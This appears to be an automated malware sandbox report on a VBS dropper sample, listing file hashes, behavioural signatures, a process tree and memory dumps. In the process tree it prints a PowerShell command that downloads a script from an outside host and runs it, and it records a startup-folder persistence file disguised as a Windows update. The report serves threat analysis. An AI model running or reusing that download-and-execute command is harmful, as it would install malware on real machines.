Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-08-2021 22:28
Static task
static1
Behavioral task
behavioral1
Sample
NS882992019101.vbs
Resource
win7v20210410
General
-
Target
NS882992019101.vbs
-
Size
13KB
-
MD5
1abbd5432118e4de7c696d5d43a7449f
-
SHA1
49fea89d7fc9f8be3afa2fd1b0ae9b6075c0acbf
-
SHA256
b4489a7f0467bee2782b5e5cf74763d0c05148a9044092eb79aba7c588f35f99
-
SHA512
7012990308d3b7e451c65b1bc1e26693a04e1bd63f3c3d735538fbb4e9092d87b3ed323a45231004fcbd3795c11803477d8c1645cf1d2b9c0fc915150161b31f
Malware Config
Extracted
http://7501.nerdpol.ovh/7501/fr.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 9 3556 powershell.exe 14 2396 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3556 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 740 wrote to memory of 3556 740 WScript.exe powershell.exe PID 740 wrote to memory of 3556 740 WScript.exe powershell.exe PID 3556 wrote to memory of 2396 3556 powershell.exe powershell.exe PID 3556 wrote to memory of 2396 3556 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NS882992019101.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://7501.nerdpol.ovh/7501/fr.txt','C:\Users\Public\fr.PS1');PowerShell -File C:\Users\Public\fr.PS12⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\fr.PS13⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\fr.PS1MD5
5480fceef4e5290938cb0a23955358df
SHA1891c237730a39b36bd443e485d3493f5f7ff68c5
SHA256d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020
SHA5123cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392
-
memory/2396-129-0x0000000000000000-mapping.dmp
-
memory/2396-140-0x0000023E344D3000-0x0000023E344D5000-memory.dmpFilesize
8KB
-
memory/2396-139-0x0000023E344D0000-0x0000023E344D2000-memory.dmpFilesize
8KB
-
memory/2396-178-0x0000023E344D6000-0x0000023E344D8000-memory.dmpFilesize
8KB
-
memory/3556-114-0x0000000000000000-mapping.dmp
-
memory/3556-119-0x000002AE72930000-0x000002AE72931000-memory.dmpFilesize
4KB
-
memory/3556-122-0x000002AE72AE0000-0x000002AE72AE1000-memory.dmpFilesize
4KB
-
memory/3556-123-0x000002AE727F0000-0x000002AE727F2000-memory.dmpFilesize
8KB
-
memory/3556-126-0x000002AE727F3000-0x000002AE727F5000-memory.dmpFilesize
8KB
-
memory/3556-138-0x000002AE727F6000-0x000002AE727F8000-memory.dmpFilesize
8KB